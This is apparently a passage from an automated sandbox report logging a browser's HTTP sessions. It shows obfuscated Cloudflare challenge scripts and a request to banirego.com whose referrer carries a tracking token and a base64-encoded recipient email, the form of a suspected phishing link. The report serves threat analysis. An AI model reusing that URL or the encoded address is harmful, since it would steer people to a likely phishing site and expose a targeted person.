                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 30 2c 48 5b 67 56 28 31 35 31 30 29 5d 28 64 5b 67 56 28 31 36 33 31 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 67 56 28 31 36 35 37 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 67 56 28 38 36 30 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 64 5b 67 56 28 37 32 38 29 5d 28 50 2c 31 29 2c 4a 3d 3d 64 5b 67 56 28 39 32 35 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 56 28 31 35 31 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 45 3d 3d 30 26 26 47 2b 2b 7d 66 6f 72 28 50 3d 32 2c 78 3d 30 3b 64 5b 67 56 28
                                                                              Data Ascii: 0,H[gV(1510)](d[gV(1631)](o,I)),I=0):J++,P>>=1,x++);}E--,0==E&&(E=Math[gV(1657)](2,G),G++),delete C[D]}else for(P=B[D],x=0;d[gV(860)](x,G);I=I<<1|d[gV(728)](P,1),J==d[gV(925)](j,1)?(J=0,H[gV(1510)](o(I)),I=0):J++,P>>=1,x++);E--,E==0&&G++}for(P=2,x=0;d[gV(
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 5a 28 31 36 35 37 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 67 5a 28 31 35 30 36 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 5a 28 32 37 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 5a 28 33 35 31 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 67 5a 28 39 32 35 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 5a 28 31 36 35 37 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 67 5a 28 31 35 33 36 29 5d 28 47 2c 48 29
                                                                              Data Ascii: =1);switch(M=J){case 0:for(J=0,K=Math[gZ(1657)](2,8),F=1;d[gZ(1506)](F,K);L=H&G,H>>=1,H==0&&(H=j,G=d[gZ(272)](o,I++)),J|=d[gZ(351)](0<L?1:0,F),F<<=1);s[B++]=e(J),M=d[gZ(925)](B,1),x--;break;case 1:for(J=0,K=Math[gZ(1657)](2,16),F=1;K!=F;L=d[gZ(1536)](G,H)
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 53 54 6c 71 77 27 3a 68 32 28 31 35 38 38 29 2c 27 4e 46 69 6d 73 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 7c 48 7d 7d 29 3b 74 72 79 7b 66 6f 72 28 6a 3d 68 32 28 31 35 32 39 29 5b 68 32 28 31 35 33 32 29 5d 28 27 7c 27 29 2c 6b 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6a 5b 6b 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6c 3d 68 32 28 31 34 38 34 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6e 5b 68 32 28 31 32 38 39 29 5d 28 69 5b 68 32 28 31 35 39 34 29 5d 2c 68 32 28 36 31 31 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6d 3d 69 5b 68 32 28 36 39 38 29 5d 28 65 57 2c 66 5b 68 32 28 31 36 34 37 29 5d 2c 66 5b 68 32 28 31 30 37 32
                                                                              Data Ascii: (G,H){return G+H},'STlqw':h2(1588),'NFims':function(G,H){return G||H}});try{for(j=h2(1529)[h2(1532)]('|'),k=0;!![];){switch(j[k++]){case'0':l=h2(1484);continue;case'1':n[h2(1289)](i[h2(1594)],h2(611));continue;case'2':m=i[h2(698)](eW,f[h2(1647)],f[h2(1072


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.549752104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:44 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:44 UTC240INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d57cf9c41f8-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:44 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.549760104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:45 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:45 UTC240INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:45 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d5bcc23c328-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.549761104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:45 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fff7d524c468c95&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:45 UTC331INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:45 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 114548
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d5e0d6819a1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:45 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 74 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25
                                                                              Data Ascii: ts.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 2c 67 69 2c 67 6d 2c 67 6e 2c 67 75 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 50 2c 65 51 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 35 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 38 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 38 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 39 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 30 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                                                              Data Ascii: ,gi,gm,gn,gu,gB,gC,gG,gH,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1440))/1+parseInt(gI(1175))/2+-parseInt(gI(1538))/3+-parseInt(gI(1238))/4*(-parseInt(gI(939))/5)+-parseInt(gI(984))/6+parseInt(gI(1220))/7+-parseInt(g
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 38 37 29 5d 26 26 28 65 4d 5b 68 68 28 37 34 33 29 5d 5b 68 68 28 39 33 36 29 5d 28 29 2c 65 4d 5b 68 68 28 37 34 33 29 5d 5b 68 68 28 31 32 30 35 29 5d 28 29 2c 65 4d 5b 68 68 28 31 32 37 33 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 68 68 28 32 32 34 29 5d 5d 5b 68 68 28 36 38 31 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 68 28 31 35 34 32 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 68 28 31 35 31 34 29 5d 5b 68 68 28 35 37 32 29 5d 2c 27 65 76 65 6e 74 27 3a 68 68 28 38 32 37 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 68 28 31 35 31 34 29 5d 5b 68 68 28 34 32 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 68 28 31 35 31 34 29 5d 5b 68 68 28 31 34 31 36 29 5d 2c 27 63 6f 64 65 27 3a 68 68 28 38 39 38 29 2c 27 72 63 56 27
                                                                              Data Ascii: 87)]&&(eM[hh(743)][hh(936)](),eM[hh(743)][hh(1205)](),eM[hh(1273)]=!![],eM[e[hh(224)]][hh(681)]({'source':e[hh(1542)],'widgetId':eM[hh(1514)][hh(572)],'event':hh(827),'cfChlOut':eM[hh(1514)][hh(422)],'cfChlOutS':eM[hh(1514)][hh(1416)],'code':hh(898),'rcV'
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 37 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 68 69 28 38 32 35 29 5d 28 69 5b 68 69 28 32 33 35 29 5d 2c 68 69 28 31 34 35 33 29 29 2c 42 3d 7b 7d 2c 42 5b 68 69 28 31 34 36 33 29 5d 3d 66 2c 42 5b 68 69 28 31 35 30 38 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 68 69 28 31 30 37 31 29 5d 3d 6b 2c 42 5b 68 69 28 36 34 36 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 68 69 28 31 31 34 35 29 5d 28 42 29 2c 44 3d 67 6e 5b 68 69 28 39 32 37 29 5d 28 43 29 5b 68 69 28 31 33 35 32 29 5d 28 27 2b 27 2c 68 69 28 32 33 37 29 29 2c 73 5b 68 69 28 33 34 33 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 69 28 31 35 31 34 29 5d 5b 68 69 28 32 34 37 29 5d 2b 27 3d 27 2b 44 29 7d 63 61 74 63 68 28 46 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 34 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e
                                                                              Data Ascii: 741)]=function(){},s[hi(825)](i[hi(235)],hi(1453)),B={},B[hi(1463)]=f,B[hi(1508)]=j,B.cc=g,B[hi(1071)]=k,B[hi(646)]=o,C=JSON[hi(1145)](B),D=gn[hi(927)](C)[hi(1352)]('+',hi(237)),s[hi(343)]('v_'+eM[hi(1514)][hi(247)]+'='+D)}catch(F){}},eM[gJ(435)]=function
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 66 6b 3d 30 2c 66 6e 3d 7b 7d 2c 66 6e 5b 67 4a 28 38 34 32 29 5d 3d 66 6d 2c 65 4d 5b 67 4a 28 35 30 32 29 5d 3d 66 6e 2c 66 70 3d 65 4d 5b 67 4a 28 31 35 31 34 29 5d 5b 67 4a 28 31 30 39 31 29 5d 5b 67 4a 28 31 31 36 34 29 5d 2c 66 71 3d 65 4d 5b 67 4a 28 31 35 31 34 29 5d 5b 67 4a 28 31 30 39 31 29 5d 5b 67 4a 28 31 31 34 37 29 5d 2c 66 72 3d 65 4d 5b 67 4a 28 31 35 31 34 29 5d 5b 67 4a 28 31 30 39 31 29 5d 5b 67 4a 28 31 31 35 36 29 5d 2c 66 44 3d 21 5b 5d 2c 66 50 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 35 37 30 29 5d 28 67 4a 28 38 34 39 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 37 2c 64 2c 65 29 7b 69 37 3d 67 4a 2c 64 3d 7b 27 5a 4f 75 45 77 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 55 4a 78 62
                                                                              Data Ascii: fk=0,fn={},fn[gJ(842)]=fm,eM[gJ(502)]=fn,fp=eM[gJ(1514)][gJ(1091)][gJ(1164)],fq=eM[gJ(1514)][gJ(1091)][gJ(1147)],fr=eM[gJ(1514)][gJ(1091)][gJ(1156)],fD=![],fP=undefined,eM[gJ(1570)](gJ(849),function(c,i7,d,e){i7=gJ,d={'ZOuEw':function(f){return f()},'UJxb
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 29 5d 3d 67 6d 2c 67 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 54 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 54 3d 67 4a 2c 64 3d 7b 27 49 67 6b 59 58 27 3a 69 54 28 31 33 34 38 29 2c 27 53 6d 6a 42 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 58 49 7a 4e 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 71 6d 66 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4c 68 77 48 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 63 7a 66 72 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6a 58 4c 64 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
                                                                              Data Ascii: )]=gm,gn=function(iT,d,e,f,g){return iT=gJ,d={'IgkYX':iT(1348),'SmjBx':function(h,i){return h==i},'XIzNh':function(h,i){return h(i)},'Dqmfs':function(h,i){return h-i},'LhwHM':function(h,i){return h|i},'czfrV':function(h,i){return i==h},'jXLdP':function(h,
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 65 74 75 72 6e 20 69 56 3d 69 55 2c 64 5b 69 56 28 35 31 34 29 5d 5b 69 56 28 31 34 31 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 69 57 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 29 7b 69 66 28 69 57 3d 69 54 2c 78 3d 7b 7d 2c 78 5b 69 57 28 37 33 31 29 5d 3d 69 57 28 31 32 30 38 29 2c 42 3d 78 2c 64 5b 69 57 28 38 37 33 29 5d 28 6e 75 6c 6c 2c 6a 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 4d 3c 6a 5b 69 57 28 32 30 36 29 5d 3b 4d 2b 3d 31 29 69 66 28 69 57 28 32 33 38 29 21 3d 3d 69 57 28 32 33 38 29 29 72 65 74 75 72 6e 20 4e
                                                                              Data Ascii: eturn iV=iU,d[iV(514)][iV(1419)](i)})},'g':function(j,o,s,iW,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P){if(iW=iT,x={},x[iW(731)]=iW(1208),B=x,d[iW(873)](null,j))return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<j[iW(206)];M+=1)if(iW(238)!==iW(238))return N
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 43 2b 2b 29 3b 46 3d 28 47 2d 2d 2c 47 3d 3d 30 26 26 28 47 3d 4d 61 74 68 5b 69 57 28 31 31 36 36 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 44 5b 4f 5d 3d 48 2b 2b 2c 53 74 72 69 6e 67 28 4e 29 29 7d 69 66 28 46 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 57 28 32 39 38 29 5d 5b 69 57 28 38 33 32 29 5d 5b 69 57 28 31 31 37 31 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 69 57 28 31 32 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 69 57 28 31 32 35 39 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 64 5b 69 57 28 38 37 34 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 69 57 28 36 34 33 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 57 28 31 32 38 35 29 5d 28 30 29 2c 43 3d 30 3b
                                                                              Data Ascii: C++);F=(G--,G==0&&(G=Math[iW(1166)](2,I),I++),D[O]=H++,String(N))}if(F!==''){if(Object[iW(298)][iW(832)][iW(1171)](E,F)){if(256>F[iW(1285)](0)){for(C=0;d[iW(1259)](C,I);K<<=1,L==d[iW(874)](o,1)?(L=0,J[iW(643)](s(K)),K=0):L++,C++);for(P=F[iW(1285)](0),C=0;
                                                                              2025-01-10 20:41:45 UTC1369INData Raw: 28 39 33 32 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4a 7c 3d 28 64 5b 6a 30 28 31 32 38 34 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 64 5b 6a 30 28 33 32 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 6a 30 28 33 30 31 29 5d 28 6f 2c 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 4e 3d 48 26 47 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 30 28 31 31
                                                                              Data Ascii: (932)]('|'),M=0;!![];){switch(L[M++]){case'0':J|=(d[j0(1284)](0,N)?1:0)*F;continue;case'1':F<<=1;continue;case'2':H>>=1;continue;case'3':d[j0(322)](0,H)&&(H=j,G=d[j0(301)](o,I++));continue;case'4':N=H&G;continue}break}switch(J){case 0:for(J=0,K=Math[j0(11


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.549762207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:45 UTC822OUTGET /favicon.ico HTTP/1.1
                                                                              Host: banirego.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://banirego.com/?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
                                                                              2025-01-10 20:41:46 UTC122INHTTP/1.1 500 Internal Server Error
                                                                              Date: Fri, 10 Jan 2025 20:41:45 GMT
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-10 20:41:46 UTC33INData Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 16<h1>Access Denied</h1>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.549764104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:45 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 3402
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
